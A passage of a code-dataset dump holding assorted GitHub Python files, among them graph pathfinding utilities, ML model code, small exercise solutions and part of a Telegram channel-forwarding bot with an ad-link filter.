reply\n bot.sendMessage(chat_id, reply)\n print(prevReply, prevText)\n\nbot.message_loop(handle)\n\nprint('Listening ...')\nwhile 1:\n time.sleep(10)\n","repo_name":"Shanthosh1/AnokhaBot","sub_path":"Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13663183262","text":"import win32com.client as wincl\r\nimport speech_recognition as sr\r\nimport webbrowser as wb\r\n\r\nspeak = wincl.Dispatch(\"SAPI.SpVoice\")\r\n\r\nr = sr.Recognizer()\r\nwith sr. Microphone() as source:\r\n speak.Speak(\"Hi my amazing QUEEN, how can I help you today?\")\r\n print(\"Listening...\")\r\n audio = r.listen(source)\r\n print (\"Thinking...\")\r\n\r\ntry:\r\n words = r.recognize_google(audio)\r\n speak.Speak(\"Ok QUEEN, let's look for \" + r.recognize_google(audio))\r\n wb.open (\"https://www.youtube.com/results?search_query=\" + words)\r\n\r\nexcept sr.UknownValueError:\r\n print(\"Google Speech Recognitiont could not understand audio\")\r\nexcept sr.RequestError as e:\r\n print (\"Could not connect to internet\")\r\n","repo_name":"AlexandraWin/Pyautogui_AW","sub_path":"Siri_AW.py","file_name":"Siri_AW.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73932168088","text":"import numpy as np\nimport argmin\n\n\nclass Problem:\n \"\"\"blah\"\"\"\n\n def __init__(self):\n \"\"\"Constructor (duh)\"\"\"\n self.a = 1.0\n self.b = 100.0\n\n def apply(self, param):\n \"\"\"apply\"\"\"\n out = (self.a - param[0]) ** 2 + self.b * (param[1] - param[0] ** 2) ** 2\n return out\n\n def gradient(self, param):\n x = param[0]\n y = param[1]\n out = np.array(\n [\n -2.0 * self.a + 4.0 * self.b * x ** 3 - 4.0 * self.b * x * y + 2.0 * x,\n 2.0 * self.b * (y - x ** 2),\n ]\n )\n return out\n\n\nprob = Problem()\n\nsolver = argmin.lbfgs(m=10)\nprint(solver)\n\nexecutor = argmin.executor(prob, solver, np.array([1.2, 1.2]))\nprint(executor)\nexecutor.run()\n","repo_name":"argmin-rs/pyargmin","sub_path":"examples/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"33703772028","text":"import argparse\r\n\r\nimport torch\r\nfrom torch.utils.data import DataLoader\r\n\r\nimport dataset as dataset_module\r\nfrom diffusion.gaussian_diffusion import GaussianDiffusion\r\nimport model.representation_learning.encoder as encoder_module\r\nfrom utils.utils import load_yaml, move_to_cuda\r\n\r\nfrom sampler.base_sampler import BaseSampler\r\n\r\nclass Sampler(BaseSampler):\r\n def __init__(self, args):\r\n super().__init__(args)\r\n print('rank{}: sampler initialized.'.format(self.global_rank))\r\n\r\n def _build_dataloader(self):\r\n dataset_config = self.config[\"dataset_config\"]\r\n self.dataset_name = dataset_config[\"dataset_name\"]\r\n dataset = getattr(dataset_module, dataset_config[\"dataset_name\"], None)(dataset_config)\r\n\r\n self.dataloader = DataLoader(\r\n dataset,\r\n collate_fn=dataset.collate_fn,\r\n batch_size=self.config[\"batch_size\"],\r\n num_workers=self.config[\"num_workers\"],\r\n shuffle=False,\r\n drop_last=False,\r\n )\r\n\r\n def _build_model(self):\r\n config_path = self.config[\"config_path\"]\r\n checkpoint_path = self.config[\"checkpoint_path\"]\r\n model_config = load_yaml(config_path)\r\n self.gaussian_diffusion = GaussianDiffusion(model_config[\"diffusion_config\"], device=self.device)\r\n self.encoder = getattr(encoder_module, model_config[\"encoder_config\"][\"model\"], None)(**model_config[\"encoder_config\"])\r\n checkpoint = torch.load(checkpoint_path, map_location=torch.device('cpu'))\r\n self.encoder.load_state_dict(checkpoint['ema_encoder'])\r\n self.encoder = self.encoder.cuda()\r\n self.encoder.eval()\r\n\r\n def start(self):\r\n z_list = []\r\n\r\n with torch.inference_mode():\r\n for i, batch in enumerate(self.dataloader):\r\n print(i)\r\n x_0 = move_to_cuda(batch[\"x_0\"])\r\n z = self.encoder(x_0)\r\n z_list.append(z.cpu())\r\n\r\n latent = torch.cat(z_list,dim=0)\r\n\r\n torch.save({\"mean\": latent.mean(0), \"std\":latent.std(0)}, \"./\"+ self.dataset_name.lower() + \".pt\")\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser()\r\n args = parser.parse_args()\r\n\r\n args.config = {\r\n \"config_path\": \"./trained-models/autoencoder/ffhq128/config.yml\",\r\n \"checkpoint_path\": \"./trained-models/autoencoder/ffhq128/checkpoint.pt\",\r\n\r\n \"dataset_config\": {\r\n \"dataset_name\": \"CELEBAHQ\",\r\n \"data_path\": \"./data/celebahq\",\r\n \"image_channel\": 3,\r\n \"image_size\": 128,\r\n \"augmentation\": False,\r\n },\r\n\r\n \"batch_size\": 100,\r\n \"num_workers\": 2,\r\n }\r\n\r\n runner = Sampler(args)\r\n runner.start()\r\n","repo_name":"ckczzj/PDAE","sub_path":"sampler/infer_latents.py","file_name":"infer_latents.py","file_ext":"py","file_size_in_byte":2755,"program_lang":"python","lang":"en","doc_type":"code","stars":200,"dataset":"github-code","pt":"31"} +{"seq_id":"1711177010","text":"import math\nfrom collections import Counter\nlst = [2,2,3,7,5,7,7,7,4,7,2,7,4,5,6,7,7,8,6,7,7,8,10,12,29,30,19,10,7,7,7,7,7,7,7,7,7]\n\nc = Counter(lst)\nn = len(lst)\n\ndef findMajorityElement():\n for key, val in c.items():\n if val >= math.floor(n/2):\n return key\n","repo_name":"YearOfProgramming/2017Challenges","sub_path":"challenge_3/python/hkl0902/Challenge_3.py","file_name":"Challenge_3.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":205,"dataset":"github-code","pt":"31"} +{"seq_id":"40280735778","text":"import helpers\n\n# apply an uber coupon to the most recent trip ($15 off previous ride)\n\n#taken as input from app\nuser = 8\n\n\n# find all credit cards of user\nquery = helpers.cur.mogrify(\n'''\nSELECT credit_cardID, userID\nFROM creditcards\nWHERE userID = %s;\n''', (str(user))\n)\n\nhelpers.cur.execute(query)\n\nuser_credit_cards = helpers.cur.fetchall()\n\n\ncard_ids = []\nfor credit_card in user_credit_cards:\n\tcard_ids.append(credit_card[0])\n\n# find most recent trip attached to list of user's credit cards\nhelpers.cur.execute(\n'''\nSELECT tripID, credit_cardID, fare\nFROM trips;\n''')\n\n# assuming the most recent trip has the greatest tripID\nrows = helpers.cur.fetchall()\nfor row in rows:\n\tif row[1] in card_ids:\n\t\ttrip_id = row[0]\n\t\tfare = row[2]\n\n\n# printing original fare to compare with discounted fare later\nprint(\"the tripID is: \" + str(trip_id) + \" and the original fare is: \" + str(fare))\n\n\n# apply coupon\nif fare <= 15:\n\tdiscounted_fare = 0\nelse:\n\tdiscounted_fare = fare - 15\n\n# round to nearest cent\ndiscounted_fare = round(discounted_fare, 2)\n\n# updating db with new fare\nhelpers.cur.execute(\n'''\nUPDATE trips\nSET fare = %s\nWHERE tripID = %s;\n''', (discounted_fare, trip_id)\n)\n\n# show the trip after the discount\nhelpers.cur.execute(\n'''\nSELECT tripID, fare\nFROM trips\nWHERE tripID = %s;\n''', (str(trip_id)))\n\nresult = helpers.cur.fetchone()\n\nprint(\"the tripID is: \" + str(result[0]) + \" and the new fare is: \" + str(result[1]))","repo_name":"SivanMehta/372-Final-Project","sub_path":"python_scripts/complex_query_3.py","file_name":"complex_query_3.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"33949699730","text":"\"\"\"\n# Sample code to perform I/O:\n\nname = input() # Reading input from STDIN\nprint('Hi, %s.' % name) # Writing output to STDOUT\n\n# Warning: Printing unwanted or ill-formatted data to output will cause the test cases to fail\n\"\"\"\n\n# Write your code here\nfrom itertools import accumulate\n\nmod = 720720\nn = int(input())\na = list(map(int, input().strip().split()))\nk = int(input())\nif k == 1:\n print(n)\nelse:\n dp = [[0] * n for _ in range(k)]\n dp[0] = list(accumulate(int(i > 0) for i in a))\n for i in range(1, k):\n for j in range(i, n):\n dp[i][j] = dp[i - 1][j - 1] + dp[i][j - 1]\n print(dp[k - 1][-1] % mod)\n","repo_name":"HBinhCT/Q-project","sub_path":"hackerearth/Algorithms/Number formation/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"12129232111","text":"name = input('Введите ваше имя: ')\nsurname = input('Введите вашу фамилию: ')\nage = float(input('Введите ваш возраст: '))\nweight = float(input('Введите ваш вес: '))\n\nprint('Ваши данные:\\n' +\n 'Имя - ' + name + '\\n' +\n 'Фамилия - ' + surname + '\\n' +\n 'Возраст - ' + str(age) + '\\n' +\n 'Вес - ' + str(weight))\n\nif age < 30 and (50 < weight < 120):\n print('Хорошее состояние')\nelif (30 < age < 40) and (weight < 50 or weight > 120):\n print('Необходимо заняться собой')\nelif age > 40 and (weight < 50 or weight > 120):\n print('Следует обратиться к врачу')\n\n","repo_name":"GKliuev/learning_python","sub_path":"lesson 1/homework/hard1.py","file_name":"hard1.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13435652301","text":"from torch.nn import functional as F\nfrom models.transformer.utils import PositionWiseFeedForward\nimport torch\nfrom torch import nn\nfrom models.transformer.attention import MultiHeadAttention\n\n\nclass EncoderLayer(nn.Module):\n def __init__(self, d_model=512, d_k=64, d_v=64, h=8, d_ff=2048, dropout=.1, identity_map_reordering=False,\n attention_module=None, attention_module_kwargs=None):\n super(EncoderLayer, self).__init__()\n self.identity_map_reordering = identity_map_reordering\n self.mhatt = MultiHeadAttention(d_model, d_k, d_v, h, dropout, identity_map_reordering=identity_map_reordering,\n attention_module=attention_module,\n attention_module_kwargs=attention_module_kwargs)\n self.pwff = PositionWiseFeedForward(d_model, d_ff, dropout, identity_map_reordering=identity_map_reordering)\n\n def forward(self, queries, keys, values, attention_mask=None, attention_weights=None):\n att = self.mhatt(queries, keys, values, attention_mask, attention_weights)\n ff = self.pwff(att)\n return ff\n\n\nclass MultiLevelEncoder(nn.Module):\n def __init__(self, N, padding_idx, d_model=512, d_k=64, d_v=64, h=8, d_ff=2048, dropout=.1,\n identity_map_reordering=False, attention_module=None, attention_module_kwargs=None):\n super(MultiLevelEncoder, self).__init__()\n self.d_model = d_model\n self.dropout = dropout\n self.layers = nn.ModuleList([EncoderLayer(d_model, d_k, d_v, h, d_ff, dropout,\n identity_map_reordering=identity_map_reordering,\n attention_module=attention_module,\n attention_module_kwargs=attention_module_kwargs)\n for _ in range(N)])\n self.padding_idx = padding_idx\n\n def forward(self, input, attention_weights=None):\n # input (b_s, seq_len, d_in)\n attention_mask = (torch.sum(input, -1) == self.padding_idx).unsqueeze(1).unsqueeze(1) # (b_s, 1, 1, seq_len)\n\n outs = []\n out = input\n for l in self.layers:\n out = l(out, out, out, attention_mask, attention_weights)\n outs.append(out.unsqueeze(1))\n\n outs = torch.cat(outs, 1)\n return outs, attention_mask\n\n\nclass MemoryAugmentedEncoder(MultiLevelEncoder):\n def __init__(self, N, padding_idx, d_in=2048, **kwargs):\n super(MemoryAugmentedEncoder, self).__init__(N, padding_idx, **kwargs)\n self.fc = nn.Linear(d_in, self.d_model)\n self.dropout = nn.Dropout(p=self.dropout)\n self.layer_norm = nn.LayerNorm(self.d_model)\n\n def forward(self, input, attention_weights=None):\n out = F.relu(self.fc(input))\n out = self.dropout(out)\n out = self.layer_norm(out)\n return super(MemoryAugmentedEncoder, self).forward(out, attention_weights=attention_weights)\n","repo_name":"aimagelab/meshed-memory-transformer","sub_path":"models/transformer/encoders.py","file_name":"encoders.py","file_ext":"py","file_size_in_byte":3015,"program_lang":"python","lang":"en","doc_type":"code","stars":478,"dataset":"github-code","pt":"31"} +{"seq_id":"22204966133","text":"\"\"\"App models.\n\"\"\"\n\nimport logging\n\nimport requests\nfrom django.db import models\n\nfrom ..azure_iot.utils import upload_module_url\n\nlogger = logging.getLogger(__name__)\n\n\nclass InferenceModule(models.Model):\n \"\"\"InferenceModule Model.\"\"\"\n\n name = models.CharField(max_length=200)\n url = models.CharField(max_length=1000, unique=True)\n\n def recommended_fps(self) -> float:\n try:\n response = requests.get(\n \"http://\" + self.url + \"/get_recommended_total_fps\", timeout=3\n )\n result = float(response.json()[\"fps\"])\n except Exception:\n logger.exception(\n \"Get recommended_fps from inference module failed. Fallback to default.\"\n )\n result = 10.0\n return result\n\n def device(self) -> bool:\n try:\n response = requests.get(\"http://\" + self.url + \"/get_device\", timeout=1)\n result = response.json()[\"device\"]\n return result\n except Exception:\n return \"cpu\"\n\n def is_vpu(self) -> bool:\n try:\n response = requests.get(\"http://\" + self.url + \"/get_device\")\n result = response.json()[\"device\"]\n return result == \"vpu\"\n except Exception:\n return False\n\n def upload_status(self) -> bool:\n try:\n response = requests.get(\"http://\" + str(upload_module_url()) + \"/status\")\n result = response.json()\n return result == \"ready\"\n except Exception:\n return False\n\n def __str__(self):\n return self.name\n","repo_name":"Azure-Samples/azure-intelligent-edge-patterns","sub_path":"factory-ai-vision/EdgeSolution/modules/WebModule/backend/vision_on_edge/inference_modules/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":113,"dataset":"github-code","pt":"31"} +{"seq_id":"5259305751","text":"# Python Standard Library Imports\nimport functools\nimport heapq\nimport math\nimport typing as T\nfrom collections import deque\nfrom enum import Enum\n\n# Local Imports\nfrom . import debug\nfrom .q import PriorityQueue\n\n\nclass DataStructure(Enum):\n HEAP = 'heap'\n DEQUE = 'deque'\n\n\nclass TriColor(Enum):\n \"\"\"Tricolor algorithm\n\n Source: https://www.cs.cornell.edu/courses/cs2112/2012sp/lectures/lec24/lec24-12sp.html\n\n Abstractly, graph traversal can be expressed in terms of the tricolor algorithm due to Dijkstra and others. In this algorithm, graph nodes are assigned one of three colors that can change over time:\n\n White nodes are undiscovered nodes that have not been seen yet in the current traversal and may even be unreachable.\n Black nodes are nodes that are reachable and that the algorithm is done with.\n Gray nodes are nodes that have been discovered but that the algorithm is not done with yet. These nodes are on a frontier between white and black.\n The progress of the algorithm is depicted by the following figure. Initially there are no black nodes and the roots are gray. As the algorithm progresses, white nodes turn into gray nodes and gray nodes turn into black nodes. Eventually there are no gray nodes left and the algorithm is done.\n\n\n The algorithm maintains a key invariant at all times: there are no edges from white nodes to black nodes. This is clearly true initially, and because it is true at the end, we know that any remaining white nodes cannot be reached from the black nodes.\n\n The algorithm pseudo-code is as follows:\n\n Color all nodes white, except for the root nodes, which are colored gray.\n While some gray node n exists:\n color some white successors of n gray.\n if n has no white successors, optionally color n black.\n This algorithm is abstract enough to describe many different graph traversals. It allows the particular implementation to choose the node n from among the gray nodes; it allows choosing which and how many white successors to color gray, and it allows delaying the coloring of gray nodes black. We says that such an algorithm is nondeterministic because its behavior is not fully defined. However, as long as it does some work on each gray node that it picks, any implementation that can be described in terms of this algorithm will finish. Further, because the black-white invariant is maintained, it must reach all reachable nodes in the graph.\n\n One value of defining graph search in terms of the tricolor algorithm is that the tricolor algorithm works even when gray nodes are worked on concurrently, as long as the black-white invariant is maintained. Thinking about this invariant therefore helps us ensure that whatever graph traversal we choose will work when parallelized, which is increasingly important.\n \"\"\"\n\n WHITE = 'white'\n GRAY = 'gray'\n BLACK = 'black'\n\n\nclass Graph:\n def __init__(self, INFINITY=math.inf, *args, **kwargs):\n \"\"\"Initialized `Graph` object\n\n Parameters:\n `INFINITY` - Used for calculating shortest paths in Dijkstra's algorithm.\n Defaults to `math.inf`, but can be any number higher than the rest of the expected shortest paths.\n Other values could be `int(1e9)` (1 billion, etc)\n \"\"\"\n self.INFINITY = INFINITY\n\n self.vertices_by_label = {}\n self.vertices = set()\n self.edges = set()\n\n Vertex.reset_cache()\n\n ##\n # Accessors\n\n def add_vertex(self, vertex, map_by_label=False):\n self.vertices.add(vertex)\n\n if map_by_label:\n self.vertices_by_label[vertex.label] = vertex\n\n def add_edge(self, edge):\n self.edges.add(edge)\n self.add_vertex(edge.source)\n self.add_vertex(edge.sink)\n\n def neighbors_of(\n self, vertex, color: T.Optional[TriColor] = None\n ) -> T.Collection[T.Tuple['Vertex', int]]:\n \"\"\"Finds the neighbors of `vertex`\n\n If `color` is provided, the neighbor must be of that color.\n\n This method MAY be overwritten if reusing `Vertex.in_edges` or `Vertex.out_edges`.\n This method SHOULD be overwritten if finding neighbors is custom.\n\n Returns a collection of `(Vertex, edge-weight)` pairs\n\n Test Cases:\n - AoC 2022.12.16\n \"\"\"\n\n neighbors = [\n (edge.sink, edge.weight or edge.sink.weight)\n for edge in vertex.out_edges\n if color is None or edge.sink.color == color\n ]\n return neighbors\n\n ##\n # Mutators\n\n def reset_vertices(self):\n for vertex in self.vertices:\n vertex.reset()\n\n ##\n # Sorting Algorithms\n\n def topological_sort(self, strategy=None):\n if strategy is None:\n strategy = DataStructure.HEAP\n # strategy = DataStructure.DEQUE\n\n return self.topological_sort__kahn(strategy=strategy)\n\n def topological_sort__kahn(self, strategy=None):\n \"\"\"Performs topological sort using Kahn's algorithm\n\n https://en.wikipedia.org/wiki/Topological_sorting#Kahn's_algorithm\n\n Pseudocode:\n\n L ← Empty list that will contain the sorted elements\n S ← Set of all nodes with no incoming edge\n\n while S is not empty do\n remove a node n from S\n add n to L\n for each node m with an edge e from n to m do\n remove edge e from the graph\n if m has no other incoming edges then\n insert m into S\n\n if graph has edges then\n return error (graph has at least one cycle)\n else\n return L (a topologically sorted order)\n\n Test Cases:\n - AoC 2018.12.07\n\n \"\"\"\n if strategy is None:\n strategy = DataStructure.HEAP\n\n L = []\n\n root_vertices = [\n vertex\n for vertex in sorted(\n self.vertices,\n key=lambda vertex: vertex.label,\n )\n if vertex.is_root\n ]\n\n if strategy == DataStructure.HEAP:\n S = []\n for vertex in root_vertices:\n heapq.heappush(S, vertex)\n elif strategy == DataStructure.DEQUE:\n S = deque(root_vertices)\n\n edges = set(self.edges)\n\n while len(S) > 0:\n if strategy == DataStructure.HEAP:\n n = heapq.heappop(S)\n elif strategy == DataStructure.DEQUE:\n n = S.popleft()\n\n L.append(n)\n\n for e in sorted(n.out_edges, key=lambda edge: edge.sink):\n m = e.sink\n edges.remove(e)\n m.remove_incoming_edge(e)\n if len(m.in_edges) == 0:\n if strategy == DataStructure.HEAP:\n heapq.heappush(S, m)\n elif strategy == DataStructure.DEQUE:\n S.append(m)\n\n if len(edges) > 0:\n raise Exception('Detected cycle in graph')\n else:\n return L\n\n ##\n # Pathfinding Algorithms\n\n def bfs(self, source, target):\n \"\"\"Calculates the shortest path to traverse a graph from `source` to `target` where all edges are unit weights.\n\n References:\n - https://en.wikipedia.org/wiki/Breadth-first_search\n\n Test Cases:\n - AoC 2022.12.12\n - AoC 2022.12.24\n \"\"\"\n source.color = TriColor.WHITE\n target.color = TriColor.WHITE\n\n Q = deque()\n Q.append(source)\n\n while len(Q) > 0:\n v = Q.popleft()\n if v.color == TriColor.BLACK:\n # a previously finished vertex\n # used when graph vertices (e.g. `self.neighbors_of()` is calculated dynamically)\n continue\n else:\n v.color = TriColor.BLACK # mark finished\n if v == target:\n # re-assign `target` in case `Vertex.__eq__` has been overridden\n target = v\n break\n\n for w, _ in self.neighbors_of(v, color=TriColor.WHITE):\n w.color = TriColor.GRAY # mark discovered\n w.bfs_parent = v\n Q.append(w)\n\n S = [] # holds the shortest path, or empty if None\n u = target\n if u.color == TriColor.BLACK:\n while u is not None:\n S.append(u)\n u = u.bfs_parent\n\n if len(S) > 0:\n path = S[::-1]\n distance = len(path)\n else:\n path = None\n distance = None\n return path, distance\n\n def shortest_path(self, source, target=None):\n (\n path,\n distance,\n distances,\n ) = self.shortest_path__dijkstra__priority_queue(source, target=target)\n return path, distance, distances\n\n def shortest_path__dijkstra__priority_queue(self, source, target=None):\n \"\"\"Calculates the shortest path to traverse a graph from `source` to `target` vertices\n\n NOTE: `source` can also be a `list`, in which case, the function will calculate\n the shortest past from any vertex in `source` and reaching `target`\n\n CAVEAT: Dijkstra's algorithm does not work with negative edge weights\n\n References:\n - https://en.wikipedia.org/wiki/Pathfinding\n - https://en.wikipedia.org/wiki/Dijkstra%27s_algorithm#Using_a_priority_queue\n - https://docs.python.org/3/library/heapq.html#priority-queue-implementation-notes\n\n Test Cases:\n - AoC 2021.12.15\n - AoC 2022.12.12\n - AoC 2022.12.16\n \"\"\"\n dist = {} # best distances to `v` from `source`\n prev = {} # predecessors of `v`\n Q = PriorityQueue()\n\n dist[source] = 0\n Q.add_with_priority(source, 0)\n\n for v in self.vertices:\n if v != source:\n dist[v] = self.INFINITY # unknown distance from source to `v`\n prev[v] = None # predecessor of `v`\n\n # the main loop\n reached_target = False\n while not Q.is_empty and not reached_target:\n priority, u = Q.extract_min() # remove and return best vertex\n\n # go through all `v` neighbors of `u`\n for v, edge_weight in self.neighbors_of(u):\n alt = dist[u] + edge_weight\n if alt < dist[v]:\n # current known shortest path to `v` is...\n dist[v] = alt # with distance `alt`\n prev[v] = u # through vertex `u`\n\n if not Q.contains(v):\n Q.add_with_priority(v, alt)\n\n if target is not None and u == target:\n # break as soon as `target` is reached\n # no need to calculate shortest path between every pair of vertices\n reached_target = True\n\n if target is not None and reached_target:\n S = [] # holds the shortest path, or empty if None\n u = target\n if u in prev or u == source:\n while u is not None:\n S.append(u)\n u = prev.get(u)\n\n path = S[::-1]\n distance = sum([v.weight for v in S])\n else:\n path = None\n distance = None\n\n return path, distance, dist\n\n def all_shortest_paths(self):\n dist = {}\n for vertex in self.vertices:\n _, _, distances = self.shortest_path(vertex)\n dist[vertex] = distances\n return dist\n\n\n@functools.total_ordering\nclass Vertex:\n _cache = {}\n\n def __init__(self, label, weight: T.Optional[int] = None):\n self.label = label\n self.weight = weight\n\n self.color = TriColor.WHITE\n\n self.out_edges = set()\n self.in_edges = set()\n\n self.bfs_parent = None\n\n def __str__(self):\n return f'{self.label} ({self.weight})'\n\n @classmethod\n def reset_cache(cls):\n cls._cache = {}\n\n @classmethod\n def get_or_create(cls, label, weight: T.Optional[int] = None):\n if label in cls._cache:\n vertex = cls._cache[label]\n was_created = False\n else:\n vertex = cls(label, weight=weight)\n was_created = True\n cls._cache[label] = vertex\n\n return vertex, was_created\n\n def reset(self):\n self.color = TriColor.WHITE\n self.bfs_parent = None\n\n def __str__(self):\n return self.label\n\n def __lt__(self, other):\n if (\n self.weight is not None\n and other.weight is not None\n and self.weight != other.weight\n ):\n result = self.weight < other.weight\n else:\n result = self.label < other.label\n return result\n\n def __eq__(self, other):\n return hash(self) == hash(other)\n\n def __hash__(self):\n h = id(self)\n return h\n\n @property\n def is_root(self):\n return len(self.in_edges) == 0\n\n @property\n def is_leaf(self):\n return len(self.out_edges) == 0\n\n def add_outgoing_edge(self, edge):\n self.out_edges.add(edge)\n\n def add_incoming_edge(self, edge):\n self.in_edges.add(edge)\n\n def remove_outgoing_edge(self, edge):\n self.out_edges.remove(edge)\n\n def remove_incoming_edge(self, edge):\n self.in_edges.remove(edge)\n\n\nclass Edge:\n def __init__(self, source, sink, weight: T.Optional[int] = None):\n self.source = source\n self.sink = sink\n self.weight = weight\n\n source.add_outgoing_edge(self)\n sink.add_incoming_edge(self)\n\n def __str__(self):\n return f'E: {self.source} - {self.sink}'\n","repo_name":"hacktoolkit/code_challenges","sub_path":"adventofcode/utils/graphs.py","file_name":"graphs.py","file_ext":"py","file_size_in_byte":13680,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"31"} +{"seq_id":"16163551538","text":"from telethon import TelegramClient, events\n\nfrom telethon.tl.functions.channels import JoinChannelRequest, LeaveChannelRequest\nfrom telethon.tl.functions.messages import ImportChatInviteRequest, CheckChatInviteRequest\n\nfrom telethon.errors.rpcerrorlist import InviteHashExpiredError, InviteHashEmptyError, MediaInvalidError, \\\n MediaEmptyError\n\nfrom telethon.tl.types import MessageMediaDocument, MessageMediaPhoto, MessageEntityTextUrl, \\\n ChatInviteAlready, ChatInvite, ReplyInlineMarkup, KeyboardButtonRow, KeyboardButtonUrl\n\nfrom uuid import uuid4\nimport os\nimport shutil\nimport re\n\nimport sqlite3\nimport json\n\nimport logging\n\nimport configparser\ncfg = configparser.ConfigParser()\ncfg.read('./config/config.cfg')\n\n# TODO: VERY BIG TODO: Add subscriptions on sly channels like \"admin-approved\" or \"subscription through bot\"\n\n# TODO: Unsubscribe actually unsubscribes client side from empty channels\n\n# TODO: Set adequate logging [~]\n\n# TODO: Little cosmetic when list is empty write different message\n\n# TODO: We can disable event propagation\n\n# TODO: (very hard) make ad filter [~]\n# some groups add links to THEIR channel, work this out [+]\n# add t.me/{etc} to ad flags [+]\n# check entities for text-url for links [+]\n# check buttons for links [+]\n# check text for links [+]\n# add 'www' to flags [+]\n\n# TODO: Some kind of lock per user on sending albums (this will solve albums merging problem)\n\n# TODO: Do not send media partly, just send link preview in any case except full media sent\n\n# Mute channels on which we subscribe [+]\n# (we can't control other connected apps, Telegram Desktop (and others) is an app)\n\n# Check if it is possible to track channels based on id of a channel, not on username (possible db overwrite) [+]\n\n# Carefully look into possibility of tracking private channels [+]\n\n# Consider re-upload if possible (limits on file size?), it will help with private channels [+]\n\n# Check for \"restricted\", \"scam\", \"fake\" flags [+]\n\n# Posts are duplicating! Look into it [+]\n\n# Re-upload files through bot [+]\n\n# Fix UserAlreadyParticipantError [+]\n\n# Share subscriptions [+]\n# (you can send output from /list, which is enough)\n\nlogging.basicConfig(filename='newsletter.log', filemode='a',\n format='%(asctime)s %(name)s %(levelname)s %(message)s',\n datefmt='[%d-%m-%Y %H:%M:%S]',\n level=logging.INFO)\n\nlogger = logging.getLogger('chat')\n\napi_id = int(cfg['ACCOUNTS']['api_id'])\napi_hash = cfg['ACCOUNTS']['api_hash']\nbot_token = cfg['ACCOUNTS']['bot_token']\nbot_client = TelegramClient('bot_client', api_id, api_hash)\nbot_bot = TelegramClient('bot_bot', api_id, api_hash).start(bot_token=bot_token)\n\n\ndef db_add_new_channel_or_user(channel_id, channel_username, channel_title, user_id):\n with sqlite3.connect('channel_to_users.db') as db:\n db_cursor = db.cursor()\n\n sql_insert = 'INSERT INTO channels(id,username,title,users) VALUES(?,?,?,?)'\n sql_select = 'SELECT * FROM channels WHERE id = ?'\n sql_update = 'UPDATE channels SET users = ? WHERE id = ?'\n\n try:\n db_cursor.execute(sql_insert, (channel_id, channel_username, channel_title, json.dumps([user_id])))\n except sqlite3.IntegrityError:\n db_cursor.execute(sql_select, (channel_id,))\n data = db_cursor.fetchall()\n data = json.loads(data[0][3])\n if user_id not in data:\n data.append(user_id)\n db_cursor.execute(sql_update, (json.dumps(data), channel_id))\n\n\ndef db_get_channel_users(channel_id):\n with sqlite3.connect('channel_to_users.db') as db:\n db_cursor = db.cursor()\n sql_select = 'SELECT * FROM channels WHERE id = ?'\n db_cursor.execute(sql_select, (channel_id,))\n data = db_cursor.fetchall()\n data = json.loads(data[0][3])\n return data\n\n\ndef db_get_user_channels(user_id):\n with sqlite3.connect('channel_to_users.db') as db:\n db_cursor = db.cursor()\n sql = 'SELECT * FROM channels WHERE users LIKE ?'\n db_cursor.execute(sql, ('%{0}%'.format(user_id),))\n data = db_cursor.fetchall()\n return data\n\n\ndef db_delete_user_from_channel(channel_id, user_id):\n with sqlite3.connect('channel_to_users.db') as db:\n db_cursor = db.cursor()\n sql_select = 'SELECT * FROM channels WHERE id = ?'\n db_cursor.execute(sql_select, (channel_id,))\n\n data = db_cursor.fetchall()\n data = json.loads(data[0][3])\n data.remove(user_id)\n if data:\n sql_update = 'UPDATE channels SET users = ? WHERE id = ?'\n db_cursor.execute(sql_update, (json.dumps(data), channel_id))\n else:\n sql_delete = 'DELETE FROM channels WHERE id = ?'\n db_cursor.execute(sql_delete, (channel_id,))\n\n return 0\n\n\ndef db_set_new_user(user_id):\n with sqlite3.connect('channel_to_users.db') as db:\n db_cursor = db.cursor()\n\n try:\n sql_insert = 'INSERT INTO states(user,state) VALUES(?,?)'\n db_cursor.execute(sql_insert, (user_id, 'idle'))\n except sqlite3.IntegrityError:\n sql_update = 'UPDATE states SET state = ? WHERE user = ?'\n db_cursor.execute(sql_update, ('idle', user_id))\n\n return 0\n\n\ndef db_update_user_state(user_id, state):\n with sqlite3.connect('channel_to_users.db') as db:\n db_cursor = db.cursor()\n\n sql_update = 'UPDATE states SET state = ? WHERE user = ?'\n db_cursor.execute(sql_update, (state, user_id))\n\n return 0\n\n\ndef db_get_user_state(user_id):\n with sqlite3.connect('channel_to_users.db') as db:\n db_cursor = db.cursor()\n\n sql_select = 'SELECT * FROM states WHERE user = ?'\n db_cursor.execute(sql_select, (user_id,))\n\n data = db_cursor.fetchall()\n\n return data[0][1]\n\n\nad_flags = ['https://', 'http://', '@', 't.me/', 'www.', 'T.me/', 'WWW.']\n\n\ndef ad_check(message, channel_username):\n # Проверяем сообщение на ссылки\n for flag in ad_flags:\n # if message.message.find(flag) != -1:\n for found in re.finditer(flag, message.message):\n if channel_username is not None:\n # Вырезаем именно эту ссылку из сообщения\n\n # Отрезаем левую часть\n cut_left_part = message.message[found.start():]\n\n # Отрезаем правую часть\n next_line_symbol = cut_left_part.find('\\n')\n space_symbol = cut_left_part.find(' ')\n\n # Если не нашли этих символов, то сообщение и есть ссылка\n if next_line_symbol == -1 and space_symbol == -1:\n cut_right_part = cut_left_part\n # Если один из символов нашёлся, а второй нет - режем по первому\n elif next_line_symbol == -1:\n 